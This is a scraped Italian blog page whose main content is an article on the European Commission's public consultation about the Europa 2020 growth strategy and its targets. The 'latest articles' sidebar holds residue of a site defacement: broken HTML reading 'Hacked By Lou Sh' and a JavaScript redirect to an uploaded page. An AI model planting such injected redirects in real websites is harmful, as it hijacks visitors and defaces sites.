EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aggiungere un commento

Europa 2020: le voci dei cittadini




Grazie all’iniziativa della Consultazione pubblica, sarà possibile esprimere il proprio parere circa le scelte dell’Unione europea in materia di sviluppo e progresso.

La Commissione europea offre la possibilità a cittadini europei, imprese e istituzioni di far valere il proprio parere circa le strategie di Europa 2020. Tramite un questionario, infatti, gli interessati potranno far pervenire pareri, dubbi e perplessità sulla strada intrapresa nel 2010 per uscire dalla crisi.

L’idea di lanciare una Consultazione pubblica nasce dalla volontà di creare un rapporto tra le istituzioni europee e i cittadini degli Stati membri, direttamente interessati dal progetto Europa 2020, con l’obiettivo di far uscire i paesi dell’Unione europea dalla crisi economica entro il 2020, tramite strategie di crescita e sviluppo. A quattro anni dall’avvio di questa strategia, la Commissione intende raccogliere i pareri per capire su quali aree è necessario intervenire per migliorare e creare un’ Unione europea capace di accogliere e affrontare le sfide del futuro. I cittadini possono compilare e inviare il questionario on line entro il 31 ottobre 2014; successivamente, all’inizio del 2015, la Commissione esaminerà le opinioni e i consigli pervenuti ed elaborerà strategie in linea con i pensieri emersi dai questionari.

Gli obiettivi di Europa 2020

“Rilanciare il sistema economico e promuovere una crescita “intelligente, sostenibile e solidale”: è questa la grande sfida che Europa 2020 vuole superare. Il progetto nasce nel marzo 2010, con l’obiettivo di continuare la strada delle riforme intrapresa con la precedente Strategia di Lisbona, della quale condivide alcuni aspetti. Le azioni intraprese nell’ambito di Europa 2020 sono volte a perseguire una crescita intelligente, sostenibile e inclusiva, per sviluppare un’economia innovativa, competitiva e capace di garantire un alto tasso di occupazione. Partendo da questa intenzione generale, l’Unione europea ha individuato cinque aree di interesse, nelle quali è necessario intraprendere un percorso di sviluppo e progresso: l’occupazione, la ricerca e lo sviluppo, il clima e l’energia, l’istruzione e la povertà. Dunque, secondo il piano di azione di Europa 2020, il 3% del PIL dell’UE sarà investito in ricerca e sviluppo, per riuscire a garantire al 75% delle persone di età compresa tra 20 e 64 anni un posto di lavoro; sarà necessario intervenire per aumentare l’utilizzo delle energie rinnovabili così come il numero di giovani laureati, mentre dovrà diminuire di almeno 20 milioni il numero delle persone a rischio povertà. A questi obiettivi corrispondono delle “iniziative faro”, nate dalla volontà di esaminare e discutere i progressi raggiunti in ogni settore di intervento:

  • Innovation Union, per migliorare le condizioni generali e l’accesso ai finanziamenti per la ricerca e l’innovazione;
  • Youth on the move, per rendere più efficienti i sistemi di insegnamento e agevolare l’ingresso dei giovani nel mercato del lavoro;
  • Digital Agenda for Europe, per sfruttare le possibilità offerte dal mercato digitale.

Queste sono solo alcune delle iniziative proposte per sensibilizzare e avvicinare gli Stati membri agli obiettivi individuati da Europa 2020, nella convinzione che il cambiamento principale debba avvenire nei sistemi dei singoli Paesi dell’Ue. Per questo, ogni anno, sono valutati i progressi nazionali raggiunti tramite la presentazione del Programma di Stabilità e Convergenza, che contiene indicazioni utili sulle finanze pubbliche e la politica di bilancio e del Programma Nazionale di Riforma (PNR) , che include gli elementi necessari per verificare i progressi realizzati per raggiungere gli obiettivi nazionali di crescita intelligente, sostenibile e solidale. In tempo di elezioni, molti partiti euroscettici denunciano una situazione di sudditanza degli Stati membri alle politiche dell’Unione europea, giustificata dall’urgenza di un intervento mirato e attento per sanare problemi sociali e arretratezze da troppo tempo irrisolti. Ora, con l’iniziativa della Consultazione pubblica, anche i cittadini più scettici e dubbiosi possono far valere la propria opinione e sentirsi attori del panorama europeo. Perché è arrivato il momento di sentirsi pienamente cittadini europei.



Nessun commento
ds Aggiungere un commento

Autori

Giulia Cara
Laurea triennale in DAMS conseguita presso l’Università di Roma Tor Vergata. Attualmente iscritta al corso di laurea specialistica in Scienze dell’informazione, della comunicazione e dell’editoria (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015

© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France